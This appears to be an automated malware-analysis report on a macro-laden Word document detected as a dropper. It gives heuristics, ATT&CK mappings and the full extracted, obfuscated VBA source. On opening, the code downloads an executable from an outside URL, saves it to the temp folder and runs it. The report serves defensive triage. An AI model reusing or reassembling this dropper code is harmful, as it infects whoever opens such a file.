MALICIOUS
Risk Score: 330
Malware Insights
MITRE ATT&CK:
- T1059.005 Visual Basic
- T1204.002 Malicious File
- T1059 Command and Scripting Interpreter
The sample is a malicious Office document containing VBA macros. The critical heuristics indicate the use of `Shell()` and `WScript.Shell`, suggesting the macro is designed to execute arbitrary commands. The `Document_Open` macro firing, combined with `OLE_VBA_PCODE_AUTOEXEC_EXEC`, strongly implies that the macro executes automatically upon opening the document to download and run a secondary payload. The ClamAV detection as 'Doc.Dropper.Donoff-5743530-0' further supports this dropper functionality.
Heuristics (10)
- ClamAV: Doc.Dropper.Donoff-5743530-0 [critical] CLAMAV_DETECTION: ClamAV detected this file as malware: Doc.Dropper.Donoff-5743530-0
- VBA macros detected [medium, 5 related findings] OLE_VBA_MACROS: Document contains VBA macro code
- WScript.Shell usage [critical] OLE_VBA_WSCRIPT: WScript.Shell usage. Matched line in script: `Dim nCeeDPf As Boolean, FxaIym As String Set pXdrWtdws = CreateObject("WScript.Shell") End Function`
- CreateObject call [high] OLE_VBA_CREATEOBJ: CreateObject call. Matched line in script: `Dim nCeeDPf As Boolean, FxaIym As String Set pXdrWtdws = CreateObject("WScript.Shell") End Function`
- CallByName call [high] OLE_VBA_CALLBYNAME: CallByName call. Matched line in script: `Public Sub eYLwpERlh(ByVal jTQvfqVVyi As Integer, ByVal evzAZHBFRs As Object, ByVal PPnSpePKe As String) CallByName evzAZHBFRs, PPnSpePKe, 1 End Sub`
- VBA p-code auto-exec with execution tokens [high] OLE_VBA_PCODE_AUTOEXEC_EXEC: Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
- Document_Open macro [low] OLE_VBA_DOCOPEN: Document_Open macro. Matched line in script: `End Sub Private Sub Document_Open() Dim wKrIkRQ As Boolean`
- Reference to Windows Script Host [high] SC_STR_WSCRIPT: Reference to Windows Script Host
- Suspicious extracted artifact [medium] EXTRACTED_FILE_STATIC_TRIAGE: One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
- Embedded URL [info] EMBEDDED_URL: One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
  - http://www.w3.org/1999/02/22-rdf-syntax-ns# (in document text, OLE body)
  - http://ns.adobe.com/xap/1.0/ (in document text, OLE body)
  - http://ns.adobe.com/xap/1.0/mm/ (in document text, OLE body)
  - http://ns.adobe.com/xap/1.0/sType/ResourceRef# (in document text, OLE body)
  - http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body)
Extracted artifacts (1)
Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 9098 bytes |

SHA-256: ea061f90922c07ac94aa555783ae43284ee12b93e6c2d784bdf307dc2d55bda8

Detection
- ClamAV: No threats found
- Obfuscation or payload: likely. 169 of 256 identifiers look randomly generated (e.g. 'shbo2pX2pbiXng2sb4byXo2bu') — consistent with name-mangling obfuscation.

Preview script (first 1,000 lines of the extracted script):
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Sub TiGkha(ByVal xMlquWywgo As String, ByVal uBdeIln As String)
wHTiRT
If mjspzU(9002, 675, "GD8u16xpiXq6R") Then
jGxNa True, "VzDpKQhumqOke", "s9wyJA7YynFRY6"
QwNZHX
tmRfIVJh 807
End If
End Sub
Private Sub TuBejJ(ByVal wjBBHYHfTE As Integer)
YoQROe 280, "DVfCvism4pfM", 3880
nSBNYIEqi
szgGkotf 3197, "x1GjTiX3BDElInW", True
End Sub
Private Sub Document_Open()
Dim wKrIkRQ As Boolean
YQrsTbUHi.OgePpyJ
End Sub
Private Sub sDXKqbqZlP()
mqxGfUKgzi 6499, "sghg9ckfB", "PhzqBaKi97EvW"
MmaltzrlX 1715
If hBTkqIt("5TKQ4phSx1gC") Then
rRoMb
Else
yqyGeqxn
End If
End Sub
Private Function BYEnbwp() As String
yhlAeROGu
BYEnbwp = "t8r9np52uuT6"
End Function
Attribute VB_Name = "AKfME"
Private Sub rmdmM(ByVal jjwrPMHg As Boolean, ByVal aAIYM As Integer)
QzYClH "Z4pkj0HqExngTl4", 8941, "tU2sk2QDXpaOId"
End Sub
Public Sub eYLwpERlh(ByVal jTQvfqVVyi As Integer, ByVal evzAZHBFRs As Object, ByVal PPnSpePKe As String)
CallByName evzAZHBFRs, PPnSpePKe, 1
End Sub
Public Sub wcBJVgmxgZ(ByVal jmxkvHgFn As Variant, ByVal xnFRUhs As String, ByVal uquUTfvrt As Variant, ByVal HjfgCR As Object, ByVal pzupg As Variant)
IXNhTW = "HTj1cqe5xt7l8Ct"
CallByName HjfgCR, xnFRUhs, 1, jmxkvHgFn, uquUTfvrt, pzupg
End Sub
Public Function EcItbLF(ByVal pzdcBi As String, ByVal TwOKvUBzk As Object, ByVal IjoqmbpmeL As String) As Variant
Dim CqfTNj As Integer, bAmMXC As Integer
Set EcItbLF = CallByName(TwOKvUBzk, pzdcBi, 2, IjoqmbpmeL)
End Function
Public Sub PvEaTWzj(ByVal BjDlGop As Variant, ByVal AYKAhrCQzW As String, ByVal DnQLUf As Integer, ByVal fAlPuwOwGS As Variant, ByVal QfoOCrOn As String, ByVal ENHUAoOz As Object)
CallByName ENHUAoOz, AYKAhrCQzW, 1, BjDlGop, fAlPuwOwGS
End Sub
Public Sub flRKpioY(ByVal kbxRy As Boolean, ByVal nTcMzlxhL As Variant, ByVal uTTrmY As Object, ByVal hMEVJqUNX As String)
CallByName uTTrmY, hMEVJqUNX, 4, nTcMzlxhL
End Sub
Private Sub NHaLno(ByVal zGNDm As Integer, ByVal zOgzx As Integer)
VYZRTX "5ATod0xo2lah"
FaPULoVT 5592, "fdBbDggks", "ZLI942GVIlp"
End Sub
Public Sub rexTPQID(ByVal gRYhj As String, ByVal XUnmhTW As Object, ByVal finvOuw As Integer, ByVal rVnBaQO As Variant, ByVal UNiNYNKFl As String)
CallByName XUnmhTW, UNiNYNKFl, 1, rVnBaQO
End Sub
Public Function WhzczRvJa(ByVal DIAvCmH As String, ByVal dwsbgSndHz As String, ByVal kTnGBfwU As Object) As Variant
Dim PVuONycMc As Integer, UNYDxtaaT As Boolean
WhzczRvJa = CallByName(kTnGBfwU, dwsbgSndHz, 2)
End Function
Attribute VB_Name = "AvlHSjEgno"
Private Sub iOhtpIWN(ByVal FnyYZVHe As Boolean, ByVal byZKiP As Integer)
JdrgwQ
End Sub
Public Function pXdrWtdws() As Object
Dim nCeeDPf As Boolean, FxaIym As String
Set pXdrWtdws = CreateObject("WScript.Shell")
End Function
Public Function ncuCh() As Object
Set ncuCh = CreateObject("MSXML2.ServerXMLHTTP.6.0")
End Function
Private Sub YXTEVLzpO()
If euVWF Then
EqgCajclK 1379, False, "wxYJthU7I"
End If
End Sub
Private Sub IUgdHTjOC(ByVal JCidtfz As String)
rwKYqDFg True, 2503
End Sub
Public Function oNzWZB() As Object
Dim bmzeolcjfe As Boolean
Set oNzWZB = CreateObject("ADODB.Stream")
End Function
Private Function kfeROuSPg() As Integer
scmBSvpTk 2792
lJSsRbNCDs
jTPYG 698, True
upFcL "VgwJp2Ob0j", "gEAg8WbfmwPxuu", 3231
kfeROuSPg = 5750
End Function
Attribute VB_Name = "HAifZ"
Public Function xpBePA(ByVal tVpwiFGr As Integer, ByVal DLEdwYNSnP As Integer, ByVal AtDDgISL As String, ByVal nMxfKcy As String) As String
Dim bEvoJYzXuD As Integer, PsDspeSF As Integer
xpBePA = Mid(nMxfKcy, tVpwiFGr, 1)
End Function
Private Sub JluYULjwP(ByVal DVEPAe As Integer, ByVal tSJXpkhdLA As String)
BkMTwPAnUV "5XpYrOKqF9", 5936
vVjYXg 5637
If LYvcZvEUHc Then
ZkAFSHcy
RYUrsdm True
aVgAUZYDE 8658, "WS04gxn6gpZV", "SNAXYPM2I"
End If
nnWkkdeYWI "b86vTiZyDG", "ogfK9ZLkZSNI", False
tvremm "27dfoMOz3yZgi5", "xZ8Wk8zZnCPVcm2", True
End Sub
Public Function dwwBZQltF(ByVal zsLiL As Integer, ByVal fFHAPFAh As Boolean, ByVal cKEqC As String, ByVal xZJpk As String) As String
dwwBZQltF = xZJpk & cKEqC
End Function
Public Function qQolhGP(ByVal FhKPZKOw As String, ByVal sVHMNjVeKL As String) As Boolean
Dim jqDPRDe As Integer
qQolhGP = InStr(1, sVHMNjVeKL, FhKPZKOw)
End Function
Attribute VB_Name = "ikgxGMeFIB"
Private Function IuqKoz(ByVal ksvJONb As Boolean, ByVal XoaMUqo As String) As Boolean
aAnoEkmH
TYWXT
SIYNpFH
If bIFLsWSDYA Then
sjrIRNel
pIxxnGPm True, 5648
Else
oRDnv
GIOdryBDU
End If
IuqKoz = False
End Function
Public Function VcJEQtch(ByVal UWzrJj As String, ByVal DvKrE As String) As String
Dim lWkHDCyY As Boolean
Dim IXHadUT As String
crcNfikH = "3SbYnWYCCzd"
For KWoJzOpom = 1 To Len(UWzrJj)
lWkHDCyY = HAifZ.qQolhGP(HAifZ.xpBePA(KWoJzOpom, 5243, YiFQBmrJpJ, UWzrJj), DvKrE)
If Not lWkHDCyY Then
VcJEQtch = HAifZ.dwwBZQltF(2102, True, HAifZ.xpBePA(KWoJzOpom, 5243, YiFQBmrJpJ, UWzrJj), VcJEQtch)
fitPL = "DJkcAgxvF"
End If
Next
End Function
Private Function FcJVs() As Integer
ngHBnhTd 5855, 1524
UimfM
kCujVAMx
If zXmQhJr Then
vMylTY
ROzIu
End If
FcJVs = 5758
End Function
Private Function YiFQBmrJpJ() As String
YiFQBmrJpJ = "XHQpd01Ine6j"
End Function
Attribute VB_Name = "YQrsTbUHi"
Private Function GlKNEX(ByVal tXXGk As String, ByVal VREGytqFmL As String) As String
Dim RtdifAmaj As Integer
Set cukhsrs = AKfME.EcItbLF(FrmAsN, AvlHSjEgno.pXdrWtdws, ikgxGMeFIB.VcJEQtch("P3RAWOVCVES3VS", ".A3VW"))
GlKNEX = cukhsrs(tXXGk)
End Function
Private Function cMtpHkTzI() As String
cMtpHkTzI = ikgxGMeFIB.VcJEQtch("OYp4eCnC", "CY4 ")
End Function
Private Function FrmAsN() As String
FrmAsN = ikgxGMeFIB.VcJEQtch("E8nYYvGirbYoGnbm8eBnGt", "8bBGYX")
End Function
Private Function wDxVDiP() As String
wDxVDiP = "SanhfpZ6A"
End Function
Private Sub SCLTF(ByVal juqeCxW As String, ByVal MWSSGjrGf As String)
Set TizlUYvbfU = AvlHSjEgno.ncuCh
AKfME.wcBJVgmxgZ GNQhUIo, ikgxGMeFIB.VcJEQtch("OYp4eCnC", "CY4 "), juqeCxW, TizlUYvbfU, False
AKfME.PvEaTWzj ikgxGMeFIB.VcJEQtch("UJsJJerj-JJAjgJeJnGt", "GJj"), TyKKR, 2963, ikgxGMeFIB.VcJEQtch("M55oLzLil57laqq/45.5B0 L(5cBqo5mpq5atOiqLbl7Be7;B)", "5LqO7B"), DmFBYFq, TizlUYvbfU
AKfME.eYLwpERlh 1177, TizlUYvbfU, nPuTLYAkX
NPcHcNUFa True, 6317, MWSSGjrGf, AKfME.WhzczRvJa(DmFBYFq, uWSGeGkFQ, TizlUYvbfU)
End Sub
Private Function uWSGeGkFQ() As String
uWSGeGkFQ = ikgxGMeFIB.VcJEQtch(".ReXsGOpoqnOsOeqBGOoqdyG", ".GXqO")
End Function
Private Sub iTloqiT()
Dim SOwnnjcsI As Integer
OIRUtHf = True
On Error GoTo brfyZKMnfD
zIxdob = False
SCLTF pjakaWHWA, ulQwtLa
CDzAraJszL ulQwtLa
Exit Sub
brfyZKMnfD:
End Sub
Private Function ulQwtLa() As String
Dim qgoRkLGhL As Integer, hIKrUpMu As Integer
ulQwtLa = GlKNEX(ikgxGMeFIB.VcJEQtch("ZTEUMZsP", "9cZUsX"), "43nl4nAIC8yPM") & utDmFlK
End Function
Private Function OIdGjN() As String
OIdGjN = ikgxGMeFIB.VcJEQtch("nTyHpaeB", "HBaqXn")
End Function
Private Function utDmFlK() As String
Dim QHtECXnn As Integer
Dim AILmw As Integer
JJNlxuFaS = True
utDmFlK = HujdV
End Function
Private Sub CDzAraJszL(ByVal LHdnE As String)
AKfME.rexTPQID "RUhBCEFChjJ", AvlHSjEgno.pXdrWtdws, 7188, LHdnE, ikgxGMeFIB.VcJEQtch("kEx2eI1c", "k31IG2")
End Sub
Private Function DmFBYFq() As String
DmFBYFq = "uUEq52NnRT9EkX"
End Function
Public Sub OgePpyJ()
Dim HORvStS As Integer
Dim ZiHhqz As Boolean
kZsag = 4121
iTloqiT
End Sub
Private Function bfkNgtlLD() As String
bfkNgtlLD = ikgxGMeFIB.VcJEQtch("YClm/o/s0e", "0dY/m")
End Function
Private Function pjakaWHWA() As String
Dim tpzysZTEN As Integer
pjakaWHWA = ikgxGMeFIB.VcJEQtch("h2bttXpb2:X//22shbo2pX2pbiXng2sb4byXo2bu.XcXXobm/2bsyXbsXtbemXb/bcXacbh22eX/2woXrXd2X.2ex2eb", "2Xb")
End Function
Private Sub NPcHcNUFa(ByVal uvQagv As Boolean, ByVal XRtbfiZodr As Integer, ByVal fRNSGEppa As String, ByVal mSfSoH As Variant)
Dim KvePG As Boolean
Dim kJwdcWWOsW As Integer
Set dPCsuso = AvlHSjEgno.oNzWZB
AKfME.flRKpioY True, 1, dPCsuso, OIdGjN
AKfME.eYLwpERlh 1177, dPCsuso, cMtpHkTzI
uRUxACPwrk = 5904
AKfME.rexTPQID wDxVDiP, dPCsuso, 7188, mSfSoH, ikgxGMeFIB.VcJEQtch("Wbbribtzek", "Zzlmkb")
sIbLjqP = "uhzu7PE4rcOp"
AKfME.PvEaTWzj fRNSGEppa, bKboP, 2963, 2, wDxVDiP, dPCsuso
AKfME.eYLwpERlh 1177, dPCsuso, bfkNgtlLD
End Sub
Private Function GNQhUIo() As String
XBoKEL = False
GNQhUIo = ikgxGMeFIB.VcJEQtch("G.E TB", ".BA ")
End Function
Private Function bKboP() As String
bKboP = ikgxGMeFIB.VcJEQtch("pSraUvremToVUFimlVed", "mprdUV")
End Function
Private Function HujdV() As String
HujdV = ikgxGMeFIB.VcJEQtch("o/o9UdbI3ocY0Y85YcY31U.oeoxUeU", "YI8Uo")
End Function
Private Function TyKKR() As String
TyKKR = ikgxGMeFIB.VcJEQtch("SEehtELReLlqhuelshhtLHhepaldlelr", "ELlhp")
End Function
Private Function nPuTLYAkX() As String
nPuTLYAkX = ikgxGMeFIB.VcJEQtch("SIerIndr", "MIrG")
End Function